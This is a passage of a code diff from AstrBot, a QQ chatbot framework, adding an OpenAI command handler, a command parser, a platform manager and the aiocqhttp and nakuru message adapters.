logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
|
||||
class OpenAIOfficialCommandHandler():
|
||||
def __init__(self, manager: CommandManager) -> None:
|
||||
self.manager = manager
|
||||
|
||||
self.provider = None
|
||||
|
||||
self.manager.register("reset", "重置会话", 10, self.reset)
|
||||
self.manager.register("his", "查看历史记录", 10, self.his)
|
||||
self.manager.register("status", "查看当前状态", 10, self.status)
|
||||
self.manager.register("switch", "切换账号", 10, self.switch)
|
||||
self.manager.register("unset", "清除个性化人格设置", 10, self.unset)
|
||||
self.manager.register("set", "设置个性化人格", 10, self.set)
|
||||
self.manager.register("draw", "调用 DallE 模型画图", 10, self.draw)
|
||||
self.manager.register("model", "切换模型", 10, self.model)
|
||||
self.manager.register("画", "调用 DallE 模型画图", 10, self.draw)
|
||||
|
||||
def set_provider(self, provider):
|
||||
self.provider = provider
|
||||
|
||||
async def reset(self, message: AstrMessageEvent, context: Context):
|
||||
tokens = self.manager.command_parser.parse(message.message_str)
|
||||
if tokens.len == 1:
|
||||
await self.provider.forget(message.session_id, keep_system_prompt=True)
|
||||
return CommandResult().message("重置成功")
|
||||
elif tokens.get(1) == 'p':
|
||||
await self.provider.forget(message.session_id)
|
||||
|
||||
async def model(self, message: AstrMessageEvent, context: Context):
|
||||
tokens = self.manager.command_parser.parse(message.message_str)
|
||||
if tokens.len == 1:
|
||||
ret = await self._print_models()
|
||||
return CommandResult().message(ret)
|
||||
model = tokens.get(1)
|
||||
if model.isdigit():
|
||||
try:
|
||||
models = await self.provider.get_models()
|
||||
except BaseException as e:
|
||||
logger.error(f"获取模型列表失败: {str(e)}")
|
||||
return CommandResult().message("获取模型列表失败,无法使用编号切换模型。可以尝试直接输入模型名来切换,如 gpt-4o。")
|
||||
models = list(models)
|
||||
if int(model) <= len(models) and int(model) >= 1:
|
||||
model = models[int(model)-1]
|
||||
self.provider.set_model(model.id)
|
||||
return CommandResult().message(f"模型已设置为 {model.id}")
|
||||
else:
|
||||
self.provider.set_model(model)
|
||||
return CommandResult().message(f"模型已设置为 {model} (自定义)")
|
||||
|
||||
async def _print_models(self):
|
||||
try:
|
||||
models = await self.provider.get_models()
|
||||
except BaseException as e:
|
||||
return "获取模型列表失败: " + str(e)
|
||||
i = 1
|
||||
ret = "OpenAI GPT 类可用模型"
|
||||
for model in models:
|
||||
ret += f"\n{i}. {model.id}"
|
||||
i += 1
|
||||
ret += "\nTips: 使用 /model 模型名/编号,即可实时更换模型。如目标模型不存在于上表,请输入模型名。"
|
||||
logger.debug(ret)
|
||||
return ret
|
||||
|
||||
def his(self, message: AstrMessageEvent, context: Context):
|
||||
tokens = self.manager.command_parser.parse(message.message_str)
|
||||
size_per_page = 3
|
||||
page = 1
|
||||
if tokens.len == 2:
|
||||
try:
|
||||
page = int(tokens.get(1))
|
||||
except BaseException as e:
|
||||
return CommandResult().message("页码格式错误")
|
||||
contexts, total_num = self.provider.dump_contexts_page(message.session_id, size_per_page, page=page)
|
||||
t_pages = total_num // size_per_page + 1
|
||||
return CommandResult().message(f"历史记录如下:\n{contexts}\n第 {page} 页 | 共 {t_pages} 页\n*输入 /his 2 跳转到第 2 页")
|
||||
|
||||
def status(self, message: AstrMessageEvent, context: Context):
|
||||
keys_data = self.provider.get_keys_data()
|
||||
ret = "OpenAI Key"
|
||||
for k in keys_data:
|
||||
status = "🟢" if keys_data[k] else "🔴"
|
||||
ret += "\n|- " + k[:8] + " " + status
|
||||
|
||||
conf = self.provider.get_configs()
|
||||
ret += "\n当前模型: " + conf['model']
|
||||
if conf['model'] in MODELS:
|
||||
ret += "\n最大上下文窗口: " + str(MODELS[conf['model']]) + " tokens"
|
||||
|
||||
if message.session_id in self.provider.session_memory and len(self.provider.session_memory[message.session_id]):
|
||||
ret += "\n你的会话上下文: " + str(self.provider.session_memory[message.session_id][-1]['usage_tokens']) + " tokens"
|
||||
|
||||
return CommandResult().message(ret)
|
||||
|
||||
async def switch(self, message: AstrMessageEvent, context: Context):
|
||||
'''
|
||||
切换账号
|
||||
'''
|
||||
tokens = self.manager.command_parser.parse(message.message_str)
|
||||
if tokens.len == 1:
|
||||
_, ret, _ = self.status()
|
||||
curr_ = self.provider.get_curr_key()
|
||||
if curr_ is None:
|
||||
ret += "当前您未选择账号。输入/switch <账号序号>切换账号。"
|
||||
else:
|
||||
ret += f"当前您选择的账号为:{curr_[-8:]}。输入/switch <账号序号>切换账号。"
|
||||
return CommandResult().message(ret)
|
||||
elif tokens.len == 2:
|
||||
try:
|
||||
key_stat = self.provider.get_keys_data()
|
||||
index = int(tokens.get(1))
|
||||
if index > len(key_stat) or index < 1:
|
||||
return CommandResult().message("账号序号错误。")
|
||||
else:
|
||||
try:
|
||||
new_key = list(key_stat.keys())[index-1]
|
||||
self.provider.set_key(new_key)
|
||||
except BaseException as e:
|
||||
return CommandResult().message("切换账号未知错误: "+str(e))
|
||||
return CommandResult().message("切换账号成功。")
|
||||
except BaseException as e:
|
||||
return CommandResult().message("切换账号错误。")
|
||||
else:
|
||||
return CommandResult().message("参数过多。")
|
||||
|
||||
def unset(self, message: AstrMessageEvent, context: Context):
|
||||
self.provider.curr_personality = {}
|
||||
self.provider.forget(message.session_id)
|
||||
return CommandResult().message("已清除个性化设置。")
|
||||
|
||||
|
||||
def set(self, message: AstrMessageEvent, context: Context):
|
||||
l = message.message_str.split(" ")
|
||||
if len(l) == 1:
|
||||
return CommandResult().message("- 设置人格: \nset 人格名。例如 set 编剧\n- 人格列表: set list\n- 人格详细信息: set view 人格名\n- 自定义人格: set 人格文本\n- 重置会话(清除人格): reset\n- 重置会话(保留人格): reset p\n\n【当前人格】: " + str(self.provider.curr_personality['prompt']))
|
||||
elif l[1] == "list":
|
||||
msg = "人格列表:\n"
|
||||
for key in personalities.keys():
|
||||
msg += f"- {key}\n"
|
||||
msg += '\n\n*输入 set view 人格名 查看人格详细信息'
|
||||
return CommandResult().message(msg)
|
||||
elif l[1] == "view":
|
||||
if len(l) == 2:
|
||||
return CommandResult().message("请输入人格名")
|
||||
ps = l[2].strip()
|
||||
if ps in personalities:
|
||||
msg = f"人格{ps}的详细信息:\n"
|
||||
msg += f"{personalities[ps]}\n"
|
||||
else:
|
||||
msg = f"人格{ps}不存在"
|
||||
return CommandResult().message(msg)
|
||||
else:
|
||||
ps = "".join(l[1:]).strip()
|
||||
if ps in personalities:
|
||||
self.provider.curr_personality = {
|
||||
'name': ps,
|
||||
'prompt': personalities[ps]
|
||||
}
|
||||
self.provider.personality_set(self.provider.curr_personality, message.session_id)
|
||||
return CommandResult().message(f"人格已设置。 \n人格信息: {ps}")
|
||||
else:
|
||||
self.provider.curr_personality = {
|
||||
'name': '自定义人格',
|
||||
'prompt': ps
|
||||
}
|
||||
self.provider.personality_set(self.provider.curr_personality, message.session_id)
|
||||
return CommandResult().message(f"人格已设置。 \n人格信息: {ps}")
|
||||
|
||||
async def draw(self, message: AstrMessageEvent, context: Context):
|
||||
message = message.message_str.removeprefix("画")
|
||||
img_url = await self.provider.image_generate(message)
|
||||
return CommandResult(
|
||||
message_chain=[Image.fromURL(img_url)],
|
||||
)
|
||||
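Wiring sketch for the handler above (illustrative, provider construction omitted): the handler registers its commands on construction and is pointed at the active provider afterwards.

manager = CommandManager()
handler = OpenAIOfficialCommandHandler(manager)  # registers reset/his/status/switch/set/draw/model
handler.set_provider(provider)  # provider: the active ProviderOpenAIOfficial instance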
25
model/command/parser.py
Normal file
@@ -0,0 +1,25 @@
import re


class CommandTokens():
    def __init__(self) -> None:
        self.tokens = []
        self.len = 0

    def get(self, idx: int):
        if idx >= self.len:
            return None
        return self.tokens[idx].strip()


class CommandParser():
    def __init__(self):
        pass

    def parse(self, message: str):
        cmd_tokens = CommandTokens()
        cmd_tokens.tokens = message.split(" ")
        cmd_tokens.len = len(cmd_tokens.tokens)
        return cmd_tokens

    def regex_match(self, message: str, command: str) -> bool:
        return re.search(command, message, re.MULTILINE) is not None
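Usage sketch for the parser above (the repository URL is illustrative):

parser = CommandParser()
tokens = parser.parse("plugin i https://github.com/example/astrbot_plugin_demo")
print(tokens.len)       # 3
print(tokens.get(0))    # "plugin"
print(tokens.get(1))    # "i"
print(tokens.get(5))    # None -- out-of-range indices return None
print(parser.regex_match("hello world", r"hel+o"))  # True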
86
model/platform/__init__.py
Normal file
@@ -0,0 +1,86 @@
|
||||
import abc
|
||||
from typing import Union, Any, List
|
||||
from nakuru.entities.components import Plain, At, Image, BaseMessageComponent
|
||||
from type.astrbot_message import AstrBotMessage
|
||||
from type.command import CommandResult
|
||||
from type.astrbot_message import MessageType
|
||||
|
||||
|
||||
class Platform():
|
||||
def __init__(self, platform_name: str, context) -> None:
|
||||
self.PLATFORM_NAME = platform_name
|
||||
self.context = context
|
||||
|
||||
@abc.abstractmethod
|
||||
async def handle_msg(self, message: AstrBotMessage):
|
||||
'''
|
||||
处理到来的消息
|
||||
'''
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def reply_msg(self, message: AstrBotMessage,
|
||||
result_message: List[BaseMessageComponent]):
|
||||
'''
|
||||
回复用户唤醒机器人的消息。(被动回复)
|
||||
'''
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def send_msg(self, target: Any, result_message: CommandResult):
|
||||
'''
|
||||
发送消息(主动)
|
||||
'''
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def send_msg_new(self, message_type: MessageType, target: str, result_message: CommandResult):
|
||||
'''
|
||||
发送消息(主动)
|
||||
'''
|
||||
pass
|
||||
|
||||
def parse_message_outline(self, message: AstrBotMessage) -> str:
|
||||
'''
|
||||
将消息解析成大纲消息形式,如: xxxxx[图片]xxxxx。用于输出日志等。
|
||||
'''
|
||||
if isinstance(message, str):
|
||||
return message
|
||||
ret = ''
|
||||
parsed = message if isinstance(message, list) else message.message
|
||||
try:
|
||||
for node in parsed:
|
||||
if isinstance(node, Plain):
|
||||
ret += node.text.replace('\n', ' ')
|
||||
elif isinstance(node, At):
|
||||
ret += f'[At: {node.name}/{node.qq}]'
|
||||
elif isinstance(node, Image):
|
||||
ret += '[图片]'
|
||||
except Exception as e:
|
||||
pass
|
||||
return ret[:100] if len(ret) > 100 else ret
|
||||
|
||||
def check_nick(self, message_str: str) -> bool:
|
||||
w = self.context.config_helper.wake_prefix
|
||||
if not w: return False
|
||||
for nick in w:
|
||||
if nick and message_str.strip().startswith(nick):
|
||||
return True
|
||||
return False
|
||||
|
||||
async def convert_to_t2i_chain(self, message_result: list) -> list:
|
||||
plain_str = ""
|
||||
rendered_images = []
|
||||
for i in message_result:
|
||||
if isinstance(i, Plain):
|
||||
plain_str += i.text
|
||||
if plain_str and len(plain_str) > 50:
|
||||
p = await self.context.image_renderer.render(plain_str, return_url=True)
|
||||
if p.startswith('http'):
|
||||
rendered_images.append(Image.fromURL(p))
|
||||
else:
|
||||
rendered_images.append(Image.fromFileSystem(p))
|
||||
return rendered_images
|
||||
|
||||
async def record_metrics(self):
|
||||
self.context.metrics_uploader.increment_platform_stat(self.PLATFORM_NAME)
|
||||
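A minimal adapter skeleton against the abstract interface above (illustrative; the real adapters in this commit range are qq_official, nakuru and aiocqhttp):

class EchoPlatform(Platform):
    def __init__(self, context) -> None:
        super().__init__("echo", context)

    async def handle_msg(self, message: AstrBotMessage):
        # log an outline of the incoming message and record platform metrics,
        # as the built-in adapters do
        print(self.parse_message_outline(message))
        await self.record_metrics()

    async def reply_msg(self, message: AstrBotMessage, result_message):
        print(self.parse_message_outline(message), "->", result_message)

    async def send_msg(self, target, result_message: CommandResult):
        pass

    async def send_msg_new(self, message_type: MessageType, target: str, result_message: CommandResult):
        pass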
97
model/platform/manager.py
Normal file
@@ -0,0 +1,97 @@
|
||||
import asyncio
|
||||
|
||||
from util.io import port_checker
|
||||
from type.register import RegisteredPlatform
|
||||
from type.types import Context
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from astrbot.message.handler import MessageHandler
|
||||
from util.cmd_config import (
|
||||
PlatformConfig,
|
||||
AiocqhttpPlatformConfig,
|
||||
NakuruPlatformConfig,
|
||||
QQOfficialPlatformConfig
|
||||
)
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
|
||||
class PlatformManager():
|
||||
def __init__(self, context: Context, message_handler: MessageHandler) -> None:
|
||||
self.context = context
|
||||
self.msg_handler = message_handler
|
||||
|
||||
def load_platforms(self):
|
||||
tasks = []
|
||||
|
||||
platforms = self.context.config_helper.platform
|
||||
logger.info(f"加载 {len(platforms)} 个机器人消息平台...")
|
||||
for platform in platforms:
|
||||
if not platform.enable:
|
||||
continue
|
||||
if platform.name == "qq_official":
|
||||
assert isinstance(platform, QQOfficialPlatformConfig), "qq_official: 无法识别的配置类型。"
|
||||
logger.info(f"加载 QQ官方 机器人消息平台 (appid: {platform.appid})")
|
||||
tasks.append(asyncio.create_task(self.qqofficial_bot(platform), name="qqofficial-adapter"))
|
||||
elif platform.name == "nakuru":
|
||||
assert isinstance(platform, NakuruPlatformConfig), "nakuru: 无法识别的配置类型。"
|
||||
logger.info(f"加载 QQ(nakuru) 机器人消息平台 ({platform.host}, {platform.websocket_port}, {platform.port})")
|
||||
tasks.append(asyncio.create_task(self.nakuru_bot(platform), name="nakuru-adapter"))
|
||||
elif platform.name == "aiocqhttp":
|
||||
assert isinstance(platform, AiocqhttpPlatformConfig), "aiocqhttp: 无法识别的配置类型。"
|
||||
logger.info("加载 QQ(aiocqhttp) 机器人消息平台")
|
||||
tasks.append(asyncio.create_task(self.aiocq_bot(platform), name="aiocqhttp-adapter"))
|
||||
|
||||
return tasks
|
||||
|
||||
async def nakuru_bot(self, config: NakuruPlatformConfig):
|
||||
'''
|
||||
运行 QQ(nakuru 适配器)
|
||||
'''
|
||||
from model.platform.qq_nakuru import QQNakuru
|
||||
noticed = False
|
||||
host = config.host
|
||||
port = config.websocket_port
|
||||
http_port = config.port
|
||||
logger.info(
|
||||
f"正在检查连接...host: {host}, ws port: {port}, http port: {http_port}")
|
||||
while True:
|
||||
if not port_checker(port=port, host=host) or not port_checker(port=http_port, host=host):
|
||||
if not noticed:
|
||||
noticed = True
|
||||
logger.warning(
|
||||
f"连接到{host}:{port}(或{http_port})失败。程序会每隔 5s 自动重试。")
|
||||
await asyncio.sleep(5)
|
||||
else:
|
||||
logger.info("nakuru 适配器已连接。")
|
||||
break
|
||||
try:
|
||||
qq_gocq = QQNakuru(self.context, self.msg_handler, config)
|
||||
self.context.platforms.append(RegisteredPlatform(
|
||||
platform_name="nakuru", platform_instance=qq_gocq, origin="internal"))
|
||||
await qq_gocq.run()
|
||||
except BaseException as e:
|
||||
logger.error("启动 nakuru 适配器时出现错误: " + str(e))
|
||||
|
||||
def aiocq_bot(self, config):
|
||||
'''
|
||||
运行 QQ(aiocqhttp 适配器)
|
||||
'''
|
||||
from model.platform.qq_aiocqhttp import AIOCQHTTP
|
||||
qq_aiocqhttp = AIOCQHTTP(self.context, self.msg_handler, config)
|
||||
self.context.platforms.append(RegisteredPlatform(
|
||||
platform_name="aiocqhttp", platform_instance=qq_aiocqhttp, origin="internal"))
|
||||
return qq_aiocqhttp.run_aiocqhttp()
|
||||
|
||||
def qqofficial_bot(self, config):
|
||||
'''
|
||||
运行 QQ 官方机器人适配器
|
||||
'''
|
||||
try:
|
||||
from model.platform.qq_official import QQOfficial
|
||||
qqchannel_bot = QQOfficial(self.context, self.msg_handler, config)
|
||||
self.context.platforms.append(RegisteredPlatform(
|
||||
platform_name="qqofficial", platform_instance=qqchannel_bot, origin="internal"))
|
||||
return qqchannel_bot.run()
|
||||
except BaseException as e:
|
||||
logger.error("启动 QQ官方机器人适配器时出现错误: " + str(e))
|
||||
279
model/platform/qq_aiocqhttp.py
Normal file
@@ -0,0 +1,279 @@
|
||||
import os  # _reply 中使用 os.environ 检查 TEST_MODE
import time
|
||||
import asyncio
|
||||
import traceback
|
||||
import logging
|
||||
from aiocqhttp import CQHttp, Event
|
||||
from aiocqhttp.exceptions import ActionFailed
|
||||
from . import Platform
|
||||
from type.astrbot_message import *
|
||||
from type.message_event import *
|
||||
from type.command import *
|
||||
from typing import Union, List, Dict
|
||||
from nakuru.entities.components import *
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from astrbot.message.handler import MessageHandler
|
||||
from util.cmd_config import PlatformConfig, AiocqhttpPlatformConfig
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
class AIOCQHTTP(Platform):
|
||||
def __init__(self, context: Context,
|
||||
message_handler: MessageHandler,
|
||||
platform_config: PlatformConfig) -> None:
|
||||
super().__init__("aiocqhttp", context)
|
||||
assert isinstance(platform_config, AiocqhttpPlatformConfig), "aiocqhttp: 无法识别的配置类型。"
|
||||
|
||||
self.message_handler = message_handler
|
||||
self.waiting = {}
|
||||
self.context = context
|
||||
self.config = platform_config
|
||||
self.unique_session = context.config_helper.platform_settings.unique_session
|
||||
self.host = platform_config.ws_reverse_host
|
||||
self.port = platform_config.ws_reverse_port
|
||||
self.admins = context.config_helper.admins_id
|
||||
|
||||
def convert_message(self, event: Event) -> AstrBotMessage:
|
||||
|
||||
abm = AstrBotMessage()
|
||||
abm.self_id = str(event.self_id)
|
||||
abm.tag = "aiocqhttp"
|
||||
|
||||
abm.sender = MessageMember(str(event.sender['user_id']), event.sender['nickname'])
|
||||
|
||||
if event['message_type'] == 'group':
|
||||
abm.type = MessageType.GROUP_MESSAGE
|
||||
elif event['message_type'] == 'private':
|
||||
abm.type = MessageType.FRIEND_MESSAGE
|
||||
|
||||
if self.unique_session:
|
||||
abm.session_id = abm.sender.user_id
|
||||
else:
|
||||
abm.session_id = str(event.group_id) if abm.type == MessageType.GROUP_MESSAGE else abm.sender.user_id
|
||||
|
||||
abm.message_id = str(event.message_id)
|
||||
abm.message = []
|
||||
|
||||
message_str = ""
|
||||
if not isinstance(event.message, list):
|
||||
err = f"aiocqhttp: 无法识别的消息类型: {str(event.message)},此条消息将被忽略。如果您在使用 go-cqhttp,请将其配置文件中的 message.post-format 更改为 array。"
|
||||
logger.critical(err)
|
||||
try:
|
||||
asyncio.ensure_future(self.bot.send(event, err))  # convert_message 是同步方法,这里把发送交给事件循环
|
||||
except BaseException as e:
|
||||
logger.error(f"回复消息失败: {e}")
|
||||
return
|
||||
for m in event.message:
|
||||
t = m['type']
|
||||
a = None
|
||||
if t == 'at':
|
||||
a = At(**m['data'])
|
||||
abm.message.append(a)
|
||||
if t == 'text':
|
||||
a = Plain(text=m['data']['text'])
|
||||
message_str += m['data']['text'].strip()
|
||||
abm.message.append(a)
|
||||
if t == 'image':
|
||||
file = m['data']['file'] if 'file' in m['data'] else None
|
||||
url = m['data']['url'] if 'url' in m['data'] else None
|
||||
a = Image(file=file, url=url)
|
||||
abm.message.append(a)
|
||||
abm.timestamp = int(time.time())
|
||||
abm.message_str = message_str
|
||||
abm.raw_message = event
|
||||
return abm
|
||||
|
||||
def run_aiocqhttp(self):
|
||||
if not self.host or not self.port:
|
||||
return
|
||||
self.bot = CQHttp(use_ws_reverse=True, import_name='aiocqhttp', api_timeout_sec=180)
|
||||
@self.bot.on_message('group')
|
||||
async def group(event: Event):
|
||||
abm = self.convert_message(event)
|
||||
if abm:
|
||||
await self.handle_msg(abm)
|
||||
|
||||
@self.bot.on_message('private')
|
||||
async def private(event: Event):
|
||||
abm = self.convert_message(event)
|
||||
if abm:
|
||||
await self.handle_msg(abm)
|
||||
|
||||
bot = self.bot.run_task(host=self.host, port=int(self.port), shutdown_trigger=self.shutdown_trigger_placeholder)
|
||||
|
||||
for handler in logging.root.handlers[:]:
|
||||
logging.root.removeHandler(handler)
|
||||
logging.getLogger('aiocqhttp').setLevel(logging.ERROR)
|
||||
|
||||
return bot
|
||||
|
||||
async def shutdown_trigger_placeholder(self):
|
||||
while self.context.running:
|
||||
await asyncio.sleep(1)
|
||||
|
||||
async def pre_check(self, message: AstrBotMessage) -> tuple:
|
||||
# if message chain contains Plain components or
|
||||
# At components which point to self_id, return True
|
||||
if message.type == MessageType.FRIEND_MESSAGE:
|
||||
return True, "friend"
|
||||
for comp in message.message:
|
||||
if isinstance(comp, At) and str(comp.qq) == message.self_id:
|
||||
return True, "at"
|
||||
# check commands which ignore prefix
|
||||
if await self.context.command_manager.check_command_ignore_prefix(message.message_str):
|
||||
return True, "command"
|
||||
# check nicks
|
||||
if self.check_nick(message.message_str):
|
||||
return True, "nick"
|
||||
return False, "none"
|
||||
|
||||
async def handle_msg(self, message: AstrBotMessage):
|
||||
logger.info(
|
||||
f"{message.sender.nickname}/{message.sender.user_id} -> {self.parse_message_outline(message)}")
|
||||
|
||||
ok, reason = await self.pre_check(message)
|
||||
if not ok:
|
||||
return
|
||||
|
||||
# 解析 role
|
||||
sender_id = str(message.sender.user_id)
|
||||
if sender_id in self.admins:
|
||||
role = 'admin'
|
||||
else:
|
||||
role = 'member'
|
||||
|
||||
# parse unified message origin
|
||||
unified_msg_origin = None
|
||||
assert isinstance(message.raw_message, Event)
|
||||
if message.type == MessageType.GROUP_MESSAGE:
|
||||
unified_msg_origin = f"aiocqhttp:{message.type.value}:{message.raw_message.group_id}"
|
||||
elif message.type == MessageType.FRIEND_MESSAGE:
|
||||
unified_msg_origin = f"aiocqhttp:{message.type.value}:{message.sender.user_id}"
|
||||
|
||||
logger.debug(f"unified_msg_origin: {unified_msg_origin}")
|
||||
|
||||
# construct astrbot message event
|
||||
ame = AstrMessageEvent.from_astrbot_message(message,
|
||||
self.context,
|
||||
"aiocqhttp",
|
||||
message.session_id,
|
||||
role,
|
||||
unified_msg_origin,
|
||||
reason == "command") # only_command
|
||||
|
||||
# transfer control to message handler
|
||||
message_result = await self.message_handler.handle(ame)
|
||||
if not message_result: return
|
||||
|
||||
await self.reply_msg(message, message_result.result_message, message_result.use_t2i)
|
||||
if message_result.callback:
|
||||
message_result.callback()
|
||||
|
||||
# 如果是等待回复的消息
|
||||
if message.session_id in self.waiting and self.waiting[message.session_id] == '':
|
||||
self.waiting[message.session_id] = message
|
||||
|
||||
return message_result
|
||||
|
||||
|
||||
async def reply_msg(self,
|
||||
message: AstrBotMessage,
|
||||
result_message: list,
|
||||
use_t2i: bool = None):
|
||||
"""
|
||||
回复用户唤醒机器人的消息。(被动回复)
|
||||
"""
|
||||
res = result_message
|
||||
|
||||
if isinstance(res, str):
|
||||
res = [Plain(text=res), ]
|
||||
|
||||
# if image mode, put all Plain texts into a new picture.
|
||||
if (use_t2i or (use_t2i == None and self.context.config_helper.t2i)) and isinstance(result_message, list):
|
||||
rendered_images = await self.convert_to_t2i_chain(res)
|
||||
if rendered_images:
|
||||
try:
|
||||
await self._reply(message, rendered_images)
|
||||
return rendered_images
|
||||
except BaseException as e:
|
||||
logger.warn(traceback.format_exc())
|
||||
logger.warn(f"以文本转图片的形式回复消息时发生错误: {e},将尝试默认方式。")
|
||||
|
||||
await self._reply(message, res)
|
||||
return res
|
||||
|
||||
async def _reply(self, message: Union[AstrBotMessage, Dict], message_chain: List[BaseMessageComponent]):
|
||||
await self.record_metrics()
|
||||
if isinstance(message_chain, str):
|
||||
message_chain = [Plain(text=message_chain), ]
|
||||
|
||||
if isinstance(message, AstrBotMessage):
|
||||
logger.info(
|
||||
f"{message.sender.user_id} <- {self.parse_message_outline(message)}")
|
||||
else:
|
||||
logger.info(f"回复消息: {message_chain}")
|
||||
|
||||
ret = []
|
||||
image_idx = []
|
||||
for idx, segment in enumerate(message_chain):
|
||||
d = segment.toDict()
|
||||
if isinstance(segment, Plain):
|
||||
d['type'] = 'text'
|
||||
if isinstance(segment, Image):
|
||||
image_idx.append(idx)
|
||||
ret.append(d)
|
||||
if os.environ.get('TEST_MODE', 'off') == 'on':
|
||||
logger.info(f"回复消息: {ret}")
|
||||
return
|
||||
try:
|
||||
await self._reply_wrapper(message, ret)
|
||||
except ActionFailed as e:
|
||||
if e.retcode == 1200:
|
||||
# ENOENT
|
||||
if not image_idx:
|
||||
raise e
|
||||
logger.warn("回复失败。检测到失败原因为文件未找到,猜测用户的协议端与 AstrBot 位于不同的文件系统上。尝试采用上传图片的方式发图。")
|
||||
for idx in image_idx:
|
||||
if ret[idx]['data']['file'].startswith('file://'):
|
||||
logger.info(f"正在上传图片: {ret[idx]['data']['path']}")
|
||||
image_url = await self.context.image_uploader.upload_image(ret[idx]['data']['path'])
|
||||
logger.info(f"上传成功。")
|
||||
ret[idx]['data']['file'] = image_url
|
||||
ret[idx]['data']['path'] = image_url
|
||||
await self._reply_wrapper(message, ret)
|
||||
else:
|
||||
logger.error(traceback.format_exc())
|
||||
logger.error(f"回复消息失败: {e}")
|
||||
raise e
|
||||
|
||||
async def _reply_wrapper(self, message: Union[AstrBotMessage, Dict], ret: List):
|
||||
if isinstance(message, AstrBotMessage):
|
||||
await self.bot.send(message.raw_message, ret)
|
||||
if isinstance(message, dict):
|
||||
if 'group_id' in message:
|
||||
await self.bot.send_group_msg(group_id=message['group_id'], message=ret)
|
||||
elif 'user_id' in message:
|
||||
await self.bot.send_private_msg(user_id=message['user_id'], message=ret)
|
||||
else:
|
||||
raise Exception("aiocqhttp: 无法识别的消息来源。仅支持 group_id 和 user_id。")
|
||||
|
||||
async def send_msg(self, target: Dict[str, int], result_message: CommandResult):
|
||||
'''
|
||||
以主动的方式给QQ用户、QQ群发送一条消息。
|
||||
|
||||
`target` 接收一个 dict 类型的值引用。
|
||||
|
||||
- 要发给 QQ 下的某个用户,请添加 key `user_id`,值为 int 类型的 qq 号;
|
||||
- 要发给某个群聊,请添加 key `group_id`,值为 int 类型的 qq 群号;
|
||||
|
||||
'''
|
||||
|
||||
await self._reply(target, result_message.message_chain)
|
||||
|
||||
async def send_msg_new(self, message_type: MessageType, target: str, result_message: CommandResult):
|
||||
if message_type == MessageType.GROUP_MESSAGE:
|
||||
await self.send_msg({'group_id': int(target)}, result_message)
|
||||
elif message_type == MessageType.FRIEND_MESSAGE:
|
||||
await self.send_msg({'user_id': int(target)}, result_message)
|
||||
else:
|
||||
raise Exception("aiocqhttp: 无法识别的消息类型。")
|
||||
310
model/platform/qq_nakuru.py
Normal file
@@ -0,0 +1,310 @@
|
||||
import time, asyncio, traceback
|
||||
|
||||
from nakuru.entities.components import Plain, At, Image, Node, BaseMessageComponent
|
||||
from nakuru import (
|
||||
CQHTTP,
|
||||
GuildMessage,
|
||||
GroupMessage,
|
||||
FriendMessage,
|
||||
GroupMemberIncrease,
|
||||
MessageItemType
|
||||
)
|
||||
from typing import Union, List, Dict
|
||||
from type.types import Context
|
||||
from . import Platform
|
||||
from type.astrbot_message import *
|
||||
from type.message_event import *
|
||||
from type.command import *
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from astrbot.message.handler import MessageHandler
|
||||
from util.cmd_config import PlatformConfig, NakuruPlatformConfig
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
|
||||
class FakeSource:
|
||||
def __init__(self, type, group_id):
|
||||
self.type = type
|
||||
self.group_id = group_id
|
||||
|
||||
|
||||
class QQNakuru(Platform):
|
||||
def __init__(self, context: Context,
|
||||
message_handler: MessageHandler,
|
||||
platform_config: PlatformConfig) -> None:
|
||||
super().__init__("nakuru", context)
|
||||
assert isinstance(platform_config, NakuruPlatformConfig), "gocq: 无法识别的配置类型。"
|
||||
|
||||
self.loop = asyncio.new_event_loop()
|
||||
asyncio.set_event_loop(self.loop)
|
||||
|
||||
self.message_handler = message_handler
|
||||
self.waiting = {}
|
||||
self.context = context
|
||||
self.unique_session = context.config_helper.platform_settings.unique_session
|
||||
self.config = platform_config
|
||||
self.admins = context.config_helper.admins_id
|
||||
|
||||
self.client = CQHTTP(
|
||||
host=self.config.host,
|
||||
port=self.config.websocket_port,
|
||||
http_port=self.config.port
|
||||
)
|
||||
gocq_app = self.client
|
||||
|
||||
@gocq_app.receiver("GroupMessage")
|
||||
async def _(app: CQHTTP, source: GroupMessage):
|
||||
if self.config.enable_group:
|
||||
abm = self.convert_message(source)
|
||||
await self.handle_msg(abm)
|
||||
|
||||
@gocq_app.receiver("FriendMessage")
|
||||
async def _(app: CQHTTP, source: FriendMessage):
|
||||
if self.config.enable_direct_message:
|
||||
abm = self.convert_message(source)
|
||||
await self.handle_msg(abm)
|
||||
|
||||
@gocq_app.receiver("GuildMessage")
|
||||
async def _(app: CQHTTP, source: GuildMessage):
|
||||
if self.config.enable_guild:
|
||||
abm = self.convert_message(source)
|
||||
await self.handle_msg(abm)
|
||||
|
||||
async def pre_check(self, message: AstrBotMessage) -> tuple:
|
||||
# if message chain contains Plain components or At components which point to self_id, return True
|
||||
if message.type == MessageType.FRIEND_MESSAGE:
|
||||
return True, "friend"
|
||||
for comp in message.message:
|
||||
if isinstance(comp, At) and str(comp.qq) == message.self_id:
|
||||
return True, "at"
|
||||
# check commands which ignore prefix
|
||||
if await self.context.command_manager.check_command_ignore_prefix(message.message_str):
|
||||
return True, "command"
|
||||
# check nicks
|
||||
if self.check_nick(message.message_str):
|
||||
return True, "nick"
|
||||
return False, "none"
|
||||
|
||||
def run(self):
|
||||
coro = self.client._run()
|
||||
return coro
|
||||
|
||||
async def handle_msg(self, message: AstrBotMessage):
|
||||
logger.info(
|
||||
f"{message.sender.nickname}/{message.sender.user_id} -> {self.parse_message_outline(message)}")
|
||||
|
||||
assert isinstance(message.raw_message,
|
||||
(GroupMessage, FriendMessage, GuildMessage))
|
||||
|
||||
# 判断是否响应消息
|
||||
ok, reason = await self.pre_check(message)
|
||||
if not ok:
|
||||
return
|
||||
|
||||
# 解析 session_id
|
||||
if self.unique_session or message.type == MessageType.FRIEND_MESSAGE:
